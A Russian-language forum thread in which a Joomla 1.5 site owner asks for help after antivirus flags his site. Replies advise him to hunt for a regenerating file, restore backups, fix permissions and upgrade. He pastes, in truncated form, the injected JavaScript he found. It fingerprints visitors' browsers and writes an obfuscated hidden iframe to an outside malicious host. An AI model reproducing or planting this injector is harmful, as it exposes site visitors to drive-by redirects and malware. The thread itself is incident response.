Взломали сайт на Joomla ...

[suschinsky]

Пришло сообщение от сапорта яндекса, о том, что на сайте обнаружен вредоносный код.
В частности Troj/JSRedir-LH и Mal/ExpJS-BP

Проинспектировав исходный код страниц, которые указал Яндекс ничего не обнаружил.
Стал проверять используемые JS скрипты. Выяснил, что действительно, в шаблоне yoo_downtown были изменены все JS скрипты.
В самое начало был добавлен кусок кода с редиректом.

Пример кода:

Код:

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1|
jungleobra = jungleobra.split('|');
var donttuch = false;
for (var i in jungleobra) {
if (stripos(navigator.userAgent, jungleobra[i])!==false) {
donttuch = true;
break;
}
}
return donttuch;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!barashkalo()) {
var cookie = getCookie('parall19els9i1kom10');
if (cookie == undefined) {
setCookie('parall19els9i1kom10', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://sertrake.ryanhirsch.me/fdhtjykiul15.html" s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'u'+'t'+'e'+';'+'l'+
}(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {

Конечно, проделал необходимые операции
- тут же отредактировал js, вырезал эти куски левого кода,
- Поменял пароли доступа к серверу, поменял пароли от админки и SQL,
- проверил права доступа к файлам и папкам на хостинге,
- поставил последний патч безопасности на joomla 1.5

Но, каково же было мое удивление, когда проверив опять js файлы в папке шаблона, я увидел тот самый код, который удалял...
Похоже, что где-то в коде шаблона зашито обновление js'ов из интернета?!

Кто-нибудь сталкивался с подобным беспределом?

[Леонид Каруна]

Мистика прям, попробуйте почистить еще.
Хотя он може инъектиться с элемента на вашем сайте, я слышал об этом, может на автомате даже.
Если так, то проблему надо искать глубже.

[3s777]

Очень вероятно что на сайте есть файл с кодом, который будет постоянно генерировать данный скрипт и вставлять его в нужные файлы. Ищите этот файл. Самое неприятное что он может быть где угодно. Начните с файлов темы.
Я бы советовал искать дыру, откуда был взлом, через какой компонент, плагин и т.д, когда найдете восстановитесь из бэкапа и устраните дыру, затем меняйте все пароли, обновляйте все плагины, компоненты. На всякий случай поставть jsecure
А вообще это знак что пора обновлятся до 3-й джумлы.
Также проблемы может быть на стороне хостинга. Подробнее об этом тут.

[zelez]

А вообще это знак что пора обновлятся до 3-й джумлы.

Подумайте об этом. Если сайт стоящий, то лучше перейти на Джумулу 2.5 или подождать и перейти сразу на 3.5. Просто даже если вы сейчас устраните проблему, то большая вероятность, что найдется другая дырка, ведь 1.5 достаточно дырявая на данный момент благодаря тому, что за это время "умельцы" находят все больше и больше дырок в плагинах и компонентах к ней.

[Я Джин]

Нормально настроенный рут решает многие проблемы безопасности на любых движках

[suschinsky]

3s777,
Честно говоря я уже почти обновился до 2.5 с помощью плагина jupgrade, но он не смог подцепить категории и разделы, получилась мешанина. Да еще и sef404 добавляет адреналина, работает через одно место - тоже не очень удачно импортировался. Не стал разгребать и откатился обратно на 1.5...

ЗЫ насчет хостера, спасибо, сейчас стуканусь к нему.

---------- Сообщение добавлено 00:50 ---------- Предыдущее 00:47 ----------

Я Джин,
Рут сменен, других пользователей в системе с доступом к shell нет.

[Я Джин]

Рут сменен,

Есть подозрение что вы сменили рут на шаровом аккаунте, но это не то, и к тому же не пасс менять нужно (если бы под рутом был взлом то вам бы не стали просто вирус в шаблон пихать...) а права нужно выставить правильно (и под рутом), а не то что по дефолту на джумле.

[suschinsky]

Я Джин,
Не понял насчет шарового акка. Есть рут в системе, на него и меняю.
Права на джумлу сейчас выставляю максимально правильно :)
Просто интересно, какую лазейку нашли... не понятно, изменение файлов требует соотвествующих прав, хотя у меня владелец файлов поставлен apache и группа apache, чтобы движок мог выполнять все действия... возможно тут собака и порылась....

[Vmir]

Поставьте компонент RSFirewall , возможно он найдёт файлы генераторы. Почитайте тут, я подробно описал методику действий в похожей ситуации.

[pljus]

Обновитесь до более свежих версий